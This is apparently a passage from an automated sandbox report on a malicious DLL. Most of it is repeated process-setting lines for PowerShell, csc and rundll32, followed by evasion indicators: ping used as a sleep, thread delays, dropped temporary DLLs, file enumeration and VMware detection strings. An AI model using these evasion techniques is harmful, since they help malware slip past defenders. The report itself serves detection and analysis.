                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Uses ping.exe to sleepShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 3419 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 5432 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ebytp2em.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uio4qdnj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hjljqxud.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3911
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5235
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3419
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5432
                      Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000027.00000000.735751989.00000000047D0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
                      Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                      Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                      Source: RuntimeBroker.exe, 00000031.00000000.776047119.000001B91D040000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000027.00000000.726075838.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                      Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B576B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033476B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
